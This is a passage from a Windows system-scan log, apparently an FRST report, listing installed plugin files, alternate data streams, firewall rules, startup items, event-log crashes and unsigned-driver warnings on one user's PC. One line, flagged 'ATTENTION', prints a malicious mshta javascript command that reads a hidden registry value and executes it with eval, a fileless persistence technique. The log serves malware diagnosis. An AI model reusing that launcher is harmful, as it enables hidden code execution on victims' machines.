2016-06-22 03:08 - 2016-06-22 03:08 - 00468120 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Twirl.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00424600 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\TwoStripColor.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00477848 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Unsharpen.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00470168 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Vignette.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00469656 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\VignetteExposure.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00535192 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\WarpVortex.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00539800 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Waves.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\WhiteBalance.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00532632 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\WitnessProtection.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00467096 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ZoomBlur.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00155288 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\AudioEcho.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00152216 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\AudioReverse.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00062616 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Balance.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00908440 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Cathedral.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00061080 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\ChannelLevels.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00908440 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\LargeRoom.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00908440 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\MediumRoom.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00709272 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Pitch.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00707736 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\ShortwaveRadio.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00908440 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\SmallRoom.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00711832 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Telephone.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00061080 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\Audio\Tone.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00060568 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\AudioTransitions\Fade.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00418456 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\AdditiveDissolve.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00424088 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\ClockWipe.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00417944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\CrossDissolve.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00417944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\CrossZoom.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00417944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\DitherDissolve.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\Fade.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00428696 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\Iris.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00421528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\LinearWipe.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\PushTransition.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00421528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\RadialWipe.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00419480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\SlideTransition.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00422040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\Split.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00421528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\VideoTransitions\Zoom.hfpl
2016-06-22 03:09 - 2016-06-22 03:09 - 00300696 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Skyway_Guard.exe
2016-06-22 03:29 - 2016-06-22 03:29 - 01062040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\ffmpeg.dll
2016-06-22 03:29 - 2016-06-22 03:29 - 02749080 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\libglesv2.dll
2016-06-22 03:29 - 2016-06-22 03:29 - 00093336 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\libegl.dll
2016-06-22 03:29 - 2016-06-22 03:29 - 03790488 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\node.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\ProgramData\Temp:74603393 [144]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SplashtopRemoteService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Classes\5623e: "C:\WINDOWS\system32\mshta.exe" "javascript:i8S1mD="m";n40z=new ActiveXObject("WScript.Shell");fuLa2="SrL4";f81HSI=n40z.RegRead("HKCU\\software\\dcyozhn\\eyzxwqjdey");mrBn9="j1V1";eval(f81HSI);adKr6SBm="t0nh";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\youtube.com -> www.youtube.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 06:25 - 2013-08-22 06:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Control Panel\Desktop\\Wallpaper -> E:\Misc\IMG_9250.JPG
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\StartupFolder: => "Microsoft Office.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Microsoft Works Calendar Reminders.lnk"
HKLM\...\StartupApproved\Run: => "SimplePass"
HKLM\...\StartupApproved\Run: => "OPBHOBroker"
HKLM\...\StartupApproved\Run: => "OPBHOBrokerDesktop"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKLM\...\StartupApproved\Run32: => "ADSK DLMSession"
HKLM\...\StartupApproved\Run32: => "iSkysoft Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "PMBVolumeWatcher"
HKLM\...\StartupApproved\Run32: => "WorksFUD"
HKLM\...\StartupApproved\Run32: => "Microsoft Works Portfolio"
HKLM\...\StartupApproved\Run32: => "Microsoft Works Update Detection"
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Google Update"
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Power2GoExpress8"
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "BlueStacks Agent"
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "iFunBox"
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "MurGee.com Auto Clicker"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [UDP Query User{53794421-7821-4278-8BBF-741BA05AB330}C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{9FCA62F9-825D-496E-A932-0EED1260581B}C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe
FirewallRules: [{F14C8E4E-1B46-4AAC-97D1-94D40AE20ABA}] => (Allow) C:\Program Files\FlightGear 2016.2.1\bin\fgcom.exe
FirewallRules: [{8B921A85-A429-4280-B9FB-07CB855F9AEE}] => (Allow) C:\Program Files\FlightGear 2016.2.1\bin\fgfs.exe
FirewallRules: [{57F389DB-7222-4A70-83D6-662C742B15A0}] => (Allow) LPort=8317
FirewallRules: [{85C86D16-7CBD-49DB-AD69-7F297733EC65}] => (Allow) LPort=50001
FirewallRules: [{E1826D7F-6D7B-41D9-BB8B-73EFFEB1E640}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{C8D63CDD-CB45-41E6-9676-C5235F513E50}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe
FirewallRules: [{A6035642-EFF6-4D3F-A471-8F29A46FE381}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe
FirewallRules: [{29458CC2-9F5A-4226-8F16-B8DCC1E9A280}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{9C04F057-2474-485A-B328-06C86CBE9AF6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8078B494-1CD1-4E93-AF3D-325569171D51}] => (Allow) LPort=50000
FirewallRules: [{A2CCF995-5E8E-4066-80A8-AA998DCA6A80}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{44AEF0DF-9B4D-4FE6-B6E4-2BDE8ABE5EE1}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{3DD8C92C-1E2B-4B13-9BD8-0C413D7304F6}] => (Allow) C:\Users\Kyle Aniel\AppData\Roaming\McAfee\Supportability\MVTLogs\ProductDetection64.exe
FirewallRules: [{09095BAF-CFEA-4A62-A961-97CE70C0F14D}] => (Allow) C:\Users\Kyle Aniel\AppData\Roaming\McAfee\Supportability\MVTLogs\ProductDetection64.exe
FirewallRules: [{22A807EF-5700-42AB-AD50-A9315FFB0ACF}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{9F5506B2-FE5A-45A6-BE89-593AF24DA79D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{149713C0-3A5B-4BA5-9CEC-10624D856994}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{50A74DE0-4CF0-4436-A417-756FC22CFA0B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0C08375C-3256-4D97-8C0C-F3B798874E9D}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{87934DC9-BB42-4A76-977F-7DB1AA22CE30}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{81D09C49-FCFC-4576-ADAB-3228E5E5812F}] => (Allow) LPort=1900
FirewallRules: [{0BD45850-ADD6-4FB8-9763-A7803A529714}] => (Allow) LPort=2869
FirewallRules: [{3E5C0A9A-8603-4FD0-9015-B81E4B910642}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{3C2C253A-75CC-4267-90E2-CFA17D99C597}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{80D6559F-AA11-4937-9A76-F8F47B0FA5A9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{63D829A9-1866-46EE-BE65-46FFC2EF34C7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{37F2FF54-CA8C-421C-A6D7-C3E7998F3851}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{035BCD7C-7394-4029-A70D-306939C141B5}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{7DE873A1-B04A-4DC4-BF07-72452AA6769A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{EB8518E6-0C53-4592-A329-17FF4E03C814}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C4117717-1BF8-4083-B45B-8E65BE340653}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A009DA25-1808-4BF7-8594-F809220AD544}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{DA464FB2-57C0-4998-85E8-54A7D16F808D}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\FaxApplications.exe
FirewallRules: [{31F26292-472F-4FFC-AA3A-0278395E83A7}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\DigitalWizards.exe
FirewallRules: [{9BF7603D-8F7C-4E49-ABCC-C7311B6E0DA8}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\SendAFax.exe
FirewallRules: [{6026A0A4-DCD7-419C-8407-81503532C00B}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\DeviceSetup.exe
FirewallRules: [{A783AA3C-A803-45F8-9270-860CE2C449BC}] => (Allow) LPort=5357
FirewallRules: [{69728B7B-B5FA-48E5-A57A-8AC7AD8CFD35}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{94C72F18-5920-4207-99C7-3139704D79E1}] => (Allow) LPort=50000
FirewallRules: [{BC519CD9-D5BF-4289-AB5D-F134CBA183D7}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{2646CD7C-C5DA-4EDC-8811-98E05D23D1AF}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{761227BA-3A0B-4783-9D92-5A778653F022}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{A5A81B4C-BC6A-4AB7-8DF4-428AB39C529D}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe
FirewallRules: [TCP Query User{0E400244-55F2-4995-BDAF-BE37DE126EA3}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe
FirewallRules: [UDP Query User{8C40C563-77CF-4CD6-B606-00A658B175BC}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe
FirewallRules: [TCP Query User{AF159B5F-F569-4FC3-A426-0F45CF62F1A6}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{DFC2E528-A381-4BB4-A766-40F096B52695}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{B075427D-FA99-437A-9826-8B8E82766740}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe
FirewallRules: [UDP Query User{FCC68B87-C0F9-4AAF-9801-459975C199C8}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe
FirewallRules: [TCP Query User{B6438A5A-55C1-49AF-8357-63FE07103FF9}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{BECDF835-CCAA-4B58-8415-09AAFE18C14E}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe
FirewallRules: [{FFF440EE-CA61-4F63-9BDB-A0B57D138FC9}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/19/2016 02:59:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Exception code: 0xc0000005
Fault offset: 0x000000000018c770
Faulting process id: 0x346c
Faulting application start time: 0x01d22a53812dc309
Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Report Id: e63ed0b1-db94-43c9-b525-1b5a427fd077
Faulting package full name:
Faulting package-relative application ID:

Error: (10/19/2016 02:58:49 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 53.0.2785.143 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: 2578

Start Time: 01d22a537b963ef2

Termination Time: 339

Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Report Id: 0ec5a952-9647-11e6-855f-8cdcd48f3756

Faulting package full name:

Faulting package-relative application ID:

Error: (10/19/2016 02:58:26 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file  for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program gramblr.exe because of this error.

Program: gramblr.exe
File:

The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
    - It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
    - It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.

Additional Data
Error value: 00000000
Disk type: 0

Error: (10/19/2016 02:58:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9
Faulting module name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9
Exception code: 0xc0000096
Fault offset: 0x0000000000517889
Faulting process id: 0xb50
Faulting application start time: 0x01d22a50c86b3f9d
Faulting application path: C:\Program Files\Gramblr\gramblr.exe
Faulting module path: C:\Program Files\Gramblr\gramblr.exe
Report Id: becbead0-356f-4889-ae6c-c4e4e2b51e6e
Faulting package full name:
Faulting package-relative application ID:

Error: (10/19/2016 02:56:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Kyle-PC)
Description: Activation of app Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/19/2016 02:52:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Exception code: 0xc0000005
Fault offset: 0x000000000018c795
Faulting process id: 0x3098
Faulting application start time: 0x01d22a52aa7adbda
Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Report Id: 7408029d-e62b-49d3-bd30-43045442e2fe
Faulting package full name:
Faulting package-relative application ID:

Error: (10/19/2016 02:46:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Exception code: 0xc0000005
Fault offset: 0x000000000018c800
Faulting process id: 0x2fc0
Faulting application start time: 0x01d22a51d3b16841
Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Report Id: 103d44b3-1281-4519-a9bf-6c6c711dfc2c
Faulting package full name:
Faulting package-relative application ID:

Error: (10/19/2016 02:40:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Exception code: 0xc0000005
Fault offset: 0x000000000018c770
Faulting process id: 0x1264
Faulting application start time: 0x01d22a50d36e52ff
Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Report Id: e2dfffd1-443e-45cf-acf7-2ce5a5b5b71a
Faulting package full name:
Faulting package-relative application ID:

Error: (10/19/2016 06:31:05 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415
Exception code: 0xc0000005
Fault offset: 0x000000000018c781
Faulting process id: 0x3130
Faulting application start time: 0x01d22a0cbb2b8562
Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe
Report Id: 646d47c2-874c-43dc-be1d-ba2bba4231da
Faulting package full name:
Faulting package-relative application ID:

Error: (10/19/2016 06:30:53 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 53.0.2785.143 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: 43e4

Start Time: 01d22a0c48a188c6

Termination Time: 60000

Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Report Id: 144ac6ff-9600-11e6-855e-303a64eb8330

Faulting package full name:

Faulting package-relative application ID:


System errors:
=============
Error: (10/19/2016 02:59:38 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly.  It has done this 4 time(s).

Error: (10/19/2016 02:59:09 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Connectivity Manager for Gramblr service terminated unexpectedly.  It has done this 2 time(s).  The following corrective action will be taken in 500 milliseconds: Restart the service.

Error: (10/19/2016 02:59:09 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Connectivity Manager for Gramblr service terminated with the following error:
Incorrect function.

Error: (10/19/2016 02:58:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Connectivity Manager for Gramblr service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 500 milliseconds: Restart the service.

Error: (10/19/2016 02:58:25 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Connectivity Manager for Gramblr service terminated with the following error:
Incorrect function.

Error: (10/19/2016 02:56:39 PM) (Source: DCOM) (EventID: 10010) (User: Kyle-PC)
Description: The server MicrosoftEdge did not register with DCOM within the required timeout.

Error: (10/19/2016 02:52:44 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly.  It has done this 3 time(s).

Error: (10/19/2016 02:46:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly.  It has done this 2 time(s).

Error: (10/19/2016 02:40:37 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/19/2016 02:39:58 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {784E29F4-5EBE-4279-9948-1E8FE941646D} did not register with DCOM within the required timeout.


CodeIntegrity:
===================================
  Date: 2016-10-19 14:36:00.227
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-18 23:53:53.561
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-18 20:48:33.285
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-18 19:51:48.344
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-18 14:27:52.440
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-18 13:52:28.063
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-18 13:34:12.922
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-17 14:58:52.353
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-16 16:33:13.963
